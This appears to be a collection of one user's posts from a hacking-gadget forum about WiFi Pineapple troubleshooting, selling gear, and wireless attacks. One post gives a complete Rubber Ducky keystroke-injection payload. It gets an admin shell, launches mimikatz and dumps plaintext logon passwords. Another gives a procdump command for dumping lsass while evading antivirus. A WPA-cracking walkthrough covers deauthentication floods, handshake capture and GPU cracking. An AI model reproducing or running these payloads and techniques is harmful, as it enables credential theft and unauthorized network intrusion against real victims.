shutin

yeah that's about it. have you thought about gettting someone who is already going to fly (civilian but especially military) to simply bring it with their luggage?

i ranted about my experiences with this gadget here: https://forums.hak5.org/index.php?/topic/30654-my-mkiv-30-experience-so-far/ a user contacted me and i have to let him be first in line at this price, but if he doesnt want it, im open to other offers. here's what i wrote him: Feel free to name your price or trade stuff.. Considering the new one is $99 and ive never got this one to work, $50 shipped. I'll take bitcoin too. it's missing the ac adapter that came with it, but it doesnt matter because i have the usb cable. i also have the pineapple juice battery pack for portability and the case that came with. also a cat5 cable and usb thumb drive i was using for storage. the only janky part is the antenna. it;s never had bad performance from that, but it's cheap and the part where it connects to the main unit isnt as sturdy as i'd like. you cant fully screw it down so its always a little loose. never been a problem but i just want to be very open about everything, esp considering i never got the damn thing working!! https://dl.dropboxusercontent.com/u/9698057/20131231_003510.jpg

oh i agree the developers worked super hard to get the thing where it got. if it truly didnt work, no one would buy it or code for it. i just reached the end of my rope. i'll settle for an android app that can capture probes :)

If I charged you US$50 for a mk4 and you paid shipping, how muchwould that come out for you? looking to sell.. https://dl.dropboxusercontent.com/u/9698057/20131231_003510.jpg

This is an awesome writeup man. You are telling it like it is. I always felt like somehow I was the fuckup because nothing ever worked right. And by most forum posts, you'd think the thintg worked like a champ all the time. But honestly? It never even did Karma right. Sure, every now and then I'd see a probe listed, but not often. I had a way better experience with some big script (PwnStar?) and a netbook using karma to autochange the network to match probing clients. At least you still have the spirit of trying to make it work. I know how incredibly frustrating it can be to reset the damn thing over and over and reinstall. I must have reset it more times than dollars I paid for the thing. Every time I look at mine I think "oh, I'll give it another shot" but what is the point? I'm not learning anything by installing infusions. I'm not learning by running a script to try and set up ICS on a mac (dont even bother with that one). If I'm not finally solving a problem, it's just been an exercise in frustration. And honestly? Where the hell am I going to deploy it? It's pretty much illegal to run that shit and I'm not a professional pen tester so it comes down to just being a novelty in my kit. It was fun at first. But I want to sell mine.. Bay area, CA. I'll take BTC :P

I'm not understanding what you want. You want to monitor everyone trying to connect to your home AP? Use kismet (on another computer) and don't channel hop. I don't see where karma comes into play here at all. Karma just broadcasts APs that clients are looking for. It has nothing really to do with logging, although all connections attempted to the Pineapple should show up on the homepage of the interface. The best solution I've found to track attempted connections to any AP is kismet and it's nice and passive. Perhaps you should rephrase your questions because I'm having trouble understanding exactly what you are trying to accomplish.

I have extensive experience with both and am happy to answer any questions. Overall, kismet is the best for using multiple cards and doing wardriving style surveys. FOr one thing, you can change the channels that it will hop/stay on interactively in the app. So let's so you want to hunt for WPA2 networks to capture the handshake. You can originally hop until you find the channel your taget AP is on. Then you can set kismet to stay on that channel exclusively. As far as the aircrack-ptw plugin for it, this will only work if the WEP ap is broadcasting a LOT of traffic because kismet will only capture IVs for a short time and then discards them if it can't crack it. One technique that would work well is to have kismet listening on the channel with the PTW plugin enabled, then use aircrack or wifite or something to inject a bunch of arp requests to generate the traffic you need and kismet will automatically crack it. Another great thing about kismet is that you can specify a bunch of WEP keys you have and it will automatically decrypt all the WEP traffic it sees and put that inthe capture. You specify that in the kismet.conf file. I absolutely love kismet. One other benefit is that it records ALL client connections it sees over time and puts that in the output log. the Aircrack suite, on the other hand is more useful for very targeted attacks. You can easily specify the exact ESSID you want to use, get visual conformation when it captures a handshake (kismet wont do that) and kep your overall file sizes low instead of the keep-everything logs kismet outputs. Another tool I haven't seen mentioned is pyrit. It has it's quirks and bugs but I've had some pretty good success with the "stripLive" feature. Basically you run it, specifying your interface to use and the output file to write, and it sits and listens and records ONLY the handshakes that it sees. Those handshakes can be used in any cracking program you want and the file size is very small. To extract just the handshake you want for later use in oclHashcat you can use "Aircrack-ng -J". This will read a pcap file and find the handshakes and let you choose which one to attack. tl:dr, kismet for wardriving and keeping an eye on your overal wifi environment. Aircrack-ng for targeted attacks and dumps and of course cracking. Hope that hepls!

Thanks! Mimikatz is a weird tool. Is there anyway to get it out spit output into a text file? It's mostly in french so it's a bit hard to understand. There is also no "help".I really want to get my version to dump the output back to the ducky drive instead of just displaying the console window.

Very interested, would even offer my Pineapple since I'm sick of trying to make it work. However, from what I've read you need that specialized PSU. 5v/2A with a custom plug. Did you just not buy one for it or.. How am I going to get it to work? I Don't want to have to order the PSU and eMMC from south korea at $30 shipping. Doesn't really save me any money. What were the problems you were running into with the software?

Woo! Finally posting my own working payload! Thanks to overwraith and readmeatuk for their base code that I just tied together. This basically does exactly what readmeatuk's code does except you won't need an internet connection. Requirements: 1) Twin duck firmware or whatever it's called that lets you have a usb storage as well as firing inject.bin upon insertion. 2) mimikatz.exe (either 32bit or 64 bit depending on target environment) placed at the root of that DUCKY drive (drive name MUST be "DUCKY"). Get it here: http://blog.gentilkiwi.com/mimikatz and use the exe from the "alpha" subdirectory Notes: I tried to do it with procdump but it takes a LONG time to write out the 36meg output file to the card and the window for procdump basically freezes and you have to forcibly kill it. You could probably write the .dmp file to a local disk and then copy it to the ducky but it's still going to take awhile. I don't think that many AV programs are looking for mimikatz so it's fairly safe,. This script could be optimized a little, it's a bit slow and it leaves two windows open. You want to leave the mimikatz window open though because after this f$#%^$ker executes you'll be staring at plaintext passwords for the logged on users!@!$#@ REM Author: shutin who just tied two other authors together: REM overwraith for the exe running stuff and redmeatuk who brought mimikatz to the party REM Name: Runmimikatz.txt DEFAULT_DELAY 75 DELAY 3000 REM get a cmd prompt this way because it's admin and we need that for mimikatz CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 REM the admin part booyah CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat contents STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto while1 ENTER STRING :break ENTER REM REM FINALLY ACTUALLY RUN AN EXE STRING START %myd%\mimikatz.exe ENTER CONTROL z ENTER STRING DuckyWait.bat ENTER DELAY 1000 ENTER DELAY 3000 STRING privilege::debug DELAY 300 ENTER DELAY 1000 STRING sekurlsa::logonPasswords full DELAY 300 ENTER

WOW! mimikatz is amazing! I'm surprised this isn't more widely known. EVeryone is so busy worrying about cracking windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to trying to brute force WPA keys. IT just spits it out in plaintext! I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this: procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp The beauty here is that procdump will not get flagged by AV like minikatz already is (6/xx on virustotal already) because it's an official microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run minikatz on it later on our own pc. How come everyone always wants the duck to grab things from the internet? We have the capabilty to save files on the ducky so why not use that instead? I'm going to try and come up with payload that simply saves a procdump file to the ducky and I'll post it here.

I appreciate this list but I haven't had any luck with it. Does anyone know by chance if this include the passwords that are include in the famous renderman rainbow tables? I will be trying those next. For those new to WPA cracking I have a few short tips I learned alone the way.. Tip #0 is don't even bother unless you are using a graphics card to crack. For a long time, pyrit was the goto app for this. pyrit is not very user-friendly. I wouldn't bother with it. It's given me nothing but headaches and fails to run properly on many machines I try to compile it on. The stripLive command works ok, but I'd veer clear of pyrit and focus on the tried and true classic aircrack-ng suite. FIrst, always make sure you are sitting on one channel when collecting a handshake. Don't be hoppin, it won't work very well. So you have airodump-ng or kismet running on a single channel for a couple days or so. You can try to force some deauths using mdk3 or airreplay -0 or airdrop-ng, but why be a dick, just wait and let the handshakes come to you. If you are in a hurry you can always use the mdk3 amok mode and nuke everyone around you for maximum collection power. I haven't thought of it till just now (prolly because it'd be illegal somehow) but you might able to wardrive around firing mdk3 on one card and sniffing using airodump on another and just vaccuum in handshakes. That's pretty evil, don't do it. Now you've got a big ass 2gig .pcap dump file filled with total crap. Beacons, broadcast traffic, you name it. You can extract juuuust the goodies with aircrack-ng -J outfile.cap. this will examine the pcap and show you where you have succesful handshakes captured. You then save them to a tiny .hccap file strictly for use with ocl-hashcatplus. What a great program! I hate saying this-- but it runs in windows perfectly! I loathe windows now but it's the only OS that can run my awesome zeroday new NVIDA card with hella CUDA cores. Before that program everyone was using pyrit for the cuda functionality and as I said, it's a pain. aircrack-ng is not going to handle the massive dictionary files you want to use. Download ocl-hashcat and read some tutorials about how to use it to crack your hccap file with your super duper "Super WPA" file you grabbed from this post. Another note, the .rar. file in this post is (I think) made with rar v3 or something, I couldnt get a successful extraction with 7zip. You'll need to download unrar.exe command line tool (for windows, not DOS) from the winrar labs site. Beware of any other RAR programs as they all seem to be bundled with malware these days. You can also safely extract it in linux. It takes me about 6 hours to run through the SuperWPA dictionary at 44k hashes a second using a $400 video card. That's actually pretty crappy performance for such an expensive card compared to some of the speeds I've seen posted online, but it's aight. Anyway, good luck. you'll need it. edit: the new version of aircrack suports dictionaries over 2gb so it may work with this one.

I emailed the company and they told me the VM image is there strictly for the convenience of their paying customers to download it whenever they need it. I think they should add maybe a sentence or two to #@%$@#% illustrate that but eh. Anyone actually played with this thing and have any comments on it? The whole package seems geared toward noob LEOs or something. I don't know that I like the idea of someone who has no idea what they are doing pointing and clicking on wifi networks to exploit. They might develop a taste for it.. With the advent of wifite.py wifi cracking can't get any easier. Silica just employs a easy-breezy exploit functionality like serving up rotten java applets during the MITM portion, from what I understand of it.

+1 for key llama too

What seems to be the problem? Can you ssh to 172.16.42.1 using Putty? Does your pineapple broadcast an AP called "Pineapple ##:##" when you turn it on? Are you making sure you connect using the POE/WAN port, not the other one? Are you connecting to http://172.16.42.1:1471 (or whatever the specific port is, i'm not 100% but I know it isn't 80).

Very excited to try this script out but having problems... plugged in usb hub with flash drive and alfa 36. immediately notice that there is no wlan0! just 1 and 2. with the alfa on 2. device connected to internet via ethernet cable. running 2.8.1. Cannot start "wireless" in pineapple status screen for whatever reason. I'm trying to connect to my WPA2 AP. try ./connect.sh - i wlan2 <details omitted> Stopping karma Failed to connect to hostapd - wpa_ctrl_open: No such file or directory Invalid interface wlan2 Done. Now I know wlan2 is valid, but am I missing a file or something? For those having trouble downloading the script, maybe you should try what i did, just READ the file and copy and paste the text to your pineapple using nano/vi. Good work, I'm sure we'll get this working. I've had nothing but nightmares with NetworkManager and hope to avoid it as much as I can.

Thanks for clarifying this. I believe Silica ships with a Ubiquity adapter (SR-71 maybe?). There shouldn't be anything too magical about "Activating" it. Perhaps you just need to spoof the MAC to match a Ubiquity dongle? I donno, I imagine software piracy is frowned upon here so I won't persue the topic any further but dang it, I really want to just demo the software.

I know this topic is almost a year old but I'm hoping someone might be following it. Using the MR3020 is a brilliant solution to get rid of the need for a wired connection. I have one laying around from my Minipwner project (ugh, that was no fun). Can you help me with the OpenWRT setup needed to make this work? I assume you would need to set the LAN interface to have a static IP of 172.16.42.42, but what about the gateway/dns settings? You wouldn't want dhcp server, right? I think I'm having trouble with the bridging aspect too. Currently if I connect to the pineapple and do a scan, the pineapple IP shows up, as well as the mr3020 and my connected device. I shouldn't be seeing the mr3020 since it should be acting as a bridge. Any help is appreciated! Thanks!

short answer, yes, buy that card, you won't be disappointed with it.

Hey all, I remember seeing a Hak5 episode about this wifi pentesting tool called Silica that I wanted to check out. I went to their site and tried to figure out how to see a price or anything about it and came across this download page: http://www.immunityinc.com/downloads.shtml which has a link to the VM http://downloads.immunityinc.com/SILICA_VM.zip So I downloaded it and it boots up but it doesn't recognize a simple Alfa. It throws a bunch of weird errors like this: [ 43.954420] rtl8187: disagrees about version of symbol ieee80211_rts_duration [ 43.954421] rtl8187: Unknown symbol ieee80211_rts_duration (err -22) Anyone know what is up with this image? Is it a trial or something you have to pay to activate or what? I'd like to see what they were talking about in the episode, since they kept the damn screen hidden the whole time. Anyone get this to work? Thanks

I know this from the documentation, I was just including my different methods of trying to connect for completeness sake.

I didn't have it set to WAN, but I went and tried changing it and still, I don't get a "get an ip" link next to radio1 :( I should probably move these problems to the Network Manager infusion page and try to get some help there.

One of the paradoxes I've found with antennas is that bigger is not necesarily better. When I purchased my Alfas, they came with a 2ft long antenna that I was all excited about but then discovered after testing was much worse than the stock 6incher. That cantenna looks cool but I think I'd get shot driving around my neighborhood with it. People would think I had a gun. I'm much more interested in buildiing the classic Pringles cantenna. It would be much stealthier!

Maybe uninstall wifi jammer then? I donno. I can add that the new beta has NOT bricked my router. It's safe. The reason you are seeing those people probing but not connecting is that they are probably probing for WPA/WPA2/WEP networks and not OPEN ones. I'm not positive, but I'm pretty sure that's why. KARMA isn't going to work on those so it doesn't bother trying to impersonate them. the way karma "gets" people is that they hopefully have a list of trusted, previosuly connected-to networks on their computer like this: MyHomeNetwork - WPA2 MySchoolsNetwork - WPA ThatCoffeeShopIJoinedOnce - OPEN Karma will impersonate the coffeeshop one and the probing client will connect to it because it's the only one available (or the one with the highest signal)